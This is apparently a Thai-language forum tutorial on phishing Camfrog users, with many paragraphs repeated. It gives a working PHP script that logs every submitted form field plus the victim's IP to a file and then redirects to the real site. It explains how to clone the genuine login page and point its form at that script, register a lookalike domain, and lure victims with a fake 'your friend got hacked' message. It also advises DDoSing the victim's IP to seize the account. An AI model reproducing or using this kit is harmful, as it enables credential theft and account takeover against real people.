ก่อนอื่น... Phishing คืออะไร?
ข้อมูลที่ซ่อนอยู่ :
Phishing คึอการใช้ "หน้าเข้าสู่ระบบปลอม" "หน้าซื้อของออนไลน์ปลอม" หรือหน้าอะไรก็แล้วแต่เพื่อหลอกให้เป้าหมายกรอกข้อมูลที่เราต้องการ แล้วข้อมูลพวกนั้นก็จะบันทึกอยู่ในล็อกของเรา.
นี้คือสคริป Phishing ที่เราจะใช้กัน พร้อมอธิบายว่า Function ตัวไหนทำอะไรบ้าง ให้อ่านคอมเม้นที่อยู่ในโค้ตก่อนนะครับ (คอมเม้นคือ บรรทัดที่เริ่มด้วย "//"):
ก็อปไปใส่ Notepad แล้วให้บันทึกเป็นนามสกุล .php ตั้งชื่อว่า login.php หรืออะไรก็ได้ที่ดูไม่น่าสงสัย จากนั้นอัพขึ้นไปบนโฮสของคุณที่สมัครไว้แล้ว. หลายคนอาจจะถามว่าทำไมต้องมี Function ดักไอพีเข้ามาด้วย? มันแล้วแต่สถานการณ์ครับ เดียวจะอธิบายว่าทำไม.
นี้คือสคริป Phishing ที่เราจะใช้กัน พร้อมอธิบายว่า Function ตัวไหนทำอะไรบ้าง ให้อ่านคอมเม้นที่อยู่ในโค้ตก่อนนะครับ (คอมเม้นคือ บรรทัดที่เริ่มด้วย "//"):
Code:
<?php
// นี้คือลิงค์ที่เหยื่อจะถูกเด้งไป หลังจากที่ล็อกอินเข้าในหน้า Phishing ของเราแล้ว (เปลี่ยนได้ ตามสถานการณ์).
header("Location: https://www.camfrog.com/en/login/check.php ");
// ที่ผมใช้ https://www.camfrog.com/en/login/check.php เพราะมันจะเด้งไปหน้า "รหัสผิด" ของเว็ป Camfrog (เว็ปจริง) เพื่อความเนียน.
// สร้างไฟล์ log.txt ขึ้นมา(ถ้ายังไม่มี) เพื่อบันทึกข้อมูลที่เหยื่อกรอกลงไปในหน้า Phishing
$handle = fopen("log.txt", "a");
fwrite($handle, "\r\n");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
// ต้องเป็นชื่อไฟล์เดียวกับ .txt ด้านบนเท่านั้นนะครับ
$myFile = "log.txt";
$fh = fopen($myFile, 'a');
//ดักไอพีเหยื่อ
$ip2 = $_SERVER['REMOTE_ADDR'];
$ip = "IP=" . $_SERVER['REMOTE_ADDR'] . "\n" ;
$stringData = "------------------------------------------\n";
$date = "Date=" . date('Y-m-d H:i:s');
fwrite($fh, $ip);
fwrite($fh, "\r\n");
fwrite($fh, $date);
fwrite($fh, "\r\n");
fwrite($fh, $stringData);
fwrite($fh, "\r\n");
fwrite($fh, "\r\n");
fclose($fh);
exit;
?>หาเป้าหมาย
ข้อมูลที่ซ่อนอยู่ :
ก่อนอื่นเราต้องรู้จักเป้าหมายของเรา ว่าเราต้องการจะแฮกใคร? ตัวอย่างนี้เป้าหมายผมคือ คนที่เล่น Camfrog. ให้เข้าไปที่หน้าล็อกอิน https://www.camfrog.com/en/login.php จากนั้นให้คลิกขวาแล้วไปที่ View page source แล้วก็อปโค้ตทั้งหมดไปไว้ใน Notepad. เราต้องแก้ไขโค้ตกันนิดหน่อย เพื่อใช้งานร่วมกับสคริป Phishing ของเรา.
ในโค้ตที่ก็อปมา ให้หาบรรทัดที่เกี่ยวกับกล่องข้อความที่ใช้ใส่ยูสเซ่อเนมและ รหัสผ่านหรือข้อมูลที่เราต้องการ เช่นตัวอย่างของ http://www.camfrog.com/en/login.php คือ บรรทัดที่ 64.
![[Image: image-FB03_523995CC.jpg]](http://www.uppic.org/image-FB03_523995CC.jpg)
ให้เราแก้ https://www.camfrog.com/en/login/check.php เป็นที่อยู่ของไฟล์ Phishing ของเรา เช่น:
หรือจะใส่ลิงค์เต็มก็ได้ไม่เป็นไร เช่น http://www.domain.com/camfrog/login.php
แค่นี้เราก็จะได้หน้า Phishing ที่เหมือนกับหน้าล็อกอินของเว็ปจริงไว้ใช้กัน. แต่.... เว็ปของคุณอาจลงเอยแบบนี้:
![[Image: image-036E_52399923.jpg]](http://www.uppic.org/image-036E_52399923.jpg)
ทั้งๆที่เว็ปจริงๆมันเป็นแบบนี้:
![[Image: image-F30D_52399A09.jpg]](http://www.uppic.org/image-F30D_52399A09.jpg)
นี้หมายความว่าหน้า login ของเว็ปจริงที่เราก็อปมามีโค้ตที่ทำงานเชื่อมโยงกันอยู่ แต่อยู่คนละที่ คนละลิงค์กัน. ให้กลับไปที่หน้า http://www.camfrog.com/en/login.php แล้วคลิกขวาจากนั้นไปที่ View page source อีกที.
สังเกตุที่บรรทัดที่ 7 - 8:
มีลิงค์ไฟล์อื่นเชื่อมโยงไปอีกทีจริงๆด้วย /css/style.css?v=54 และ /css/login.css?v=54. ให้เราคลิกขวาที่ลิงค์นี้ แล้วกด Copy link address เราก็จะได้ลิงค์เต็มของมัน:
ให้เอาไปใส่แทน /css/style.css?v=54 นะครับ ทำแบบเดียวกันนี้กับทุกลิงค์ที่อยู่ในหน้านั้น (รวมถึงลิงค์รูปต่างๆด้วย).
เราก็จะได้หน้า Phishing ที่เหมือนกับหน้าของเว็ปจริงๆทุกอย่าง แต่..... บางเว็ป เช่นเว็ป Camfrog มันไม่ยอมเราง่ายๆ -.-
![[Image: image-D7C3_5239A88F.jpg]](http://www.uppic.org/image-D7C3_5239A88F.jpg)
นี้แสดงว่ามันบล็อกข้อมูลไม่ให้แสดงออกมา. นี้คืองานของคุณ คุณต้องหาว่า Statement ตัวไหนในโค้ตทำหน้าที่บล็อกไม่ให้แสดงข้อความออกมา เช่นตัวอย่างของผม จะอยู่บรรทัดที่ 32 - 34
ให้ลบ Statement นี้ออกไปแล้ว เว็ป Phishing คุณก็จะสมบูรณ์แบบนี้:
Save โค้ตทั้งหมดนี้ไว้ในไฟล์ Index.html แล้วอัพลงโฮสของคุณ พอถีงตอนนี้โฮสคุณต้องมี 2 ไฟล์ด้วยกันคือ Index.html และ Login.php
ในโค้ตที่ก็อปมา ให้หาบรรทัดที่เกี่ยวกับกล่องข้อความที่ใช้ใส่ยูสเซ่อเนมและ รหัสผ่านหรือข้อมูลที่เราต้องการ เช่นตัวอย่างของ http://www.camfrog.com/en/login.php คือ บรรทัดที่ 64.
Code:
<form name="controlForm" id="controlForm" method="POST" action="https://www.camfrog.com/en/login/check.php" onsubmit="return formSubmit();">ให้เราแก้ https://www.camfrog.com/en/login/check.php เป็นที่อยู่ของไฟล์ Phishing ของเรา เช่น:
Code:
<form name="controlForm" id="controlForm" method="POST" action="/camfrog/login.php" onsubmit="return formSubmit();">แค่นี้เราก็จะได้หน้า Phishing ที่เหมือนกับหน้าล็อกอินของเว็ปจริงไว้ใช้กัน. แต่.... เว็ปของคุณอาจลงเอยแบบนี้:
ข้อมูลที่ซ่อนอยู่ :
ทั้งๆที่เว็ปจริงๆมันเป็นแบบนี้:
ข้อมูลที่ซ่อนอยู่ :
นี้หมายความว่าหน้า login ของเว็ปจริงที่เราก็อปมามีโค้ตที่ทำงานเชื่อมโยงกันอยู่ แต่อยู่คนละที่ คนละลิงค์กัน. ให้กลับไปที่หน้า http://www.camfrog.com/en/login.php แล้วคลิกขวาจากนั้นไปที่ View page source อีกที.
สังเกตุที่บรรทัดที่ 7 - 8:
Code:
<link rel='stylesheet' type="text/css" href="/css/style.css?v=54"/>
<link rel='stylesheet' type="text/css" href="/css/login.css?v=54"/>
Code:
https://www.camfrog.com/css/style.css?v=54เราก็จะได้หน้า Phishing ที่เหมือนกับหน้าของเว็ปจริงๆทุกอย่าง แต่..... บางเว็ป เช่นเว็ป Camfrog มันไม่ยอมเราง่ายๆ -.-
ข้อมูลที่ซ่อนอยู่ :
นี้แสดงว่ามันบล็อกข้อมูลไม่ให้แสดงออกมา. นี้คืองานของคุณ คุณต้องหาว่า Statement ตัวไหนในโค้ตทำหน้าที่บล็อกไม่ให้แสดงข้อความออกมา เช่นตัวอย่างของผม จะอยู่บรรทัดที่ 32 - 34
Code:
<script type="text/javascript">
document.write('<style>.nullspan { visibility:hidden; } </style>');
</script>
ข้อมูลที่ซ่อนอยู่ :
โดเมน
ข้อมูลที่ซ่อนอยู่ :
โดเมนคือสิ่งที่สำคัญ คุณต้องใช้โดเมนที่เหมือนกับเว็ปจริงให้มากที่สุดเท่าที่จะเป็นไปได้ เพื่อเพิ่มโอกาสที่เหยื่อจะเชื่อเราและกรอกข้อมูลลงไปในหน้า Phishing ของเรา. เช่น http://www.camfrog.com แต่ถ้าลิงค์ Phishing ของคุณใช้http://www.HiMynameIsPoundandIloveYoutoo.com คงไม่มีใครบ้าจี้กดเข้าไปแล้วกรอกข้อมูลสำคัญลงไปแน่.
ตัวอย่างที่ดี
เว็ปจริง:
เว็ป Phishing ของผม:
![[Image: image-CBAA_5239ADD6.jpg]](http://www.uppic.org/image-CBAA_5239ADD6.jpg)
![[Image: image-C483_5239ADD6.jpg]](http://www.uppic.org/image-C483_5239ADD6.jpg)
ตัวอย่างที่ดี
เว็ปจริง:
ข้อมูลที่ซ่อนอยู่ :
เว็ป Phishing ของผม:
ข้อมูลที่ซ่อนอยู่ :
จินตนาการ
ข้อมูลที่ซ่อนอยู่ :
แฮกเกอร์ที่ดีใช้จินตนาการในการแฮกครับ. ไม่ว่าคุณจะทำอะไรคุณต้องใช้จินตนาการ ไม่ว่าจะเป็นตั้งแต่เขียนโค้ต หรือแม้กระทั้งการใช้ชื่อ โดเมน.
ใช้จิตนาการเขียนโค้ต:
ใช้จินตนาการในการ สมัคร/ใช้ โดเมน:
ใช้จิตนาการเขียนโค้ต:
ข้อมูลที่ซ่อนอยู่ :
Phishing ทั่วไปจะไม่มี Function ดักไอพีแบบที่ผมใส่เพิ่มเข้าไป. แต่เราจะเอาไอพีเขามาทำไม?. ตัวอย่างเช่น Camfrog ถ้าคุณได้พาสเขามาแล้ว คุณจำเป็นต้องเปลี่ยนพาสเขาให้เร็วที่สุด ก่อนที่เขาจะรู้ตัวแล้วเปลี่ยนพาสใหม่. จะทำแบบนั้นได้คุณต้องล็อกอินทับเข้าไปในไอดีเขาแล้วเปลี่ยนพาส นั้นจะทำให้โอกาสที่คุณจะพลาดมีสูงมาก เพราะถ้าเน็ตคุณไม่ดี คุณก็ออนเด้งสู้เขาไม่ทัน.
แต่เรามีไอพีเขา. เราจะจัดการ DDOS เขาให้ขาดการเชื่อมต่อไปก่อน แค่นี้เราก็มีเวลาเหลือเฝือที่จะเปลี่ยนพาสโดยไม่มีอุปสรรค์.
แต่เรามีไอพีเขา. เราจะจัดการ DDOS เขาให้ขาดการเชื่อมต่อไปก่อน แค่นี้เราก็มีเวลาเหลือเฝือที่จะเปลี่ยนพาสโดยไม่มีอุปสรรค์.
ใช้จินตนาการในการ สมัคร/ใช้ โดเมน:
ข้อมูลที่ซ่อนอยู่ :
คุณไม่จำเป็นต้องทำหน้า Phishing ที่มีลิงค์ตรงตัวอย่างเดียวก็ได้ เช่น http://www.camfrog.cam/en/login.php ถ้าคุณเอาลิงค์ไปให้คนที่คุณแฮกแล้วพูดว่า เฮ้ย ล็อกอินเข้าไปดิ. -.- คือง่ายไปไหม?!! ถ้าคนๆนั้นไม่มีปัญหาทางสมอง หรือกำลังเฮิทเพราะแฟนทิ้ง มันคงไม่กดไปให้คุณหรอกครับ. ลองแบบนี้เป็นไง:
A: เห้ยยย มึงเข้าไปดูดิ ไอดี Pound โดนแฮกวะ profiles.camfrog.cam/en/Pound
ด้วยความตกใจและตื่นเต้น คนๆนั้นก็จะกดเข้าไปในหน้า Phishing ของเรา.
นี้คือการใช้จินตนาการในการแฮก ข้อนี้สำคัญที่สุด ไม่ว่าคุณจะมีโปรแกรมที่เทพที่พร้อมแค่ไหน แต่ถ้าคุณไม่มีจินตนาการในการแฮก อุปกรณ์พวกนั้นก็ไร้ค่า.
Quote:profiles.camfrog.cam/en/Poundแล้วอาจจะแต่งนิทานหน่อย เช่น:
A: เห้ยยย มึงเข้าไปดูดิ ไอดี Pound โดนแฮกวะ profiles.camfrog.cam/en/Pound
ด้วยความตกใจและตื่นเต้น คนๆนั้นก็จะกดเข้าไปในหน้า Phishing ของเรา.
นี้คือการใช้จินตนาการในการแฮก ข้อนี้สำคัญที่สุด ไม่ว่าคุณจะมีโปรแกรมที่เทพที่พร้อมแค่ไหน แต่ถ้าคุณไม่มีจินตนาการในการแฮก อุปกรณ์พวกนั้นก็ไร้ค่า.
ผมอยากให้คุณสอนการเเฮ็กหลายๆอย่างให้ผม ผมอยากเป็นเเฮกเกอร์บ้างขอละเอียดๆ
ตอบลบของ่ายๆได้หมครับ
ตอบลบ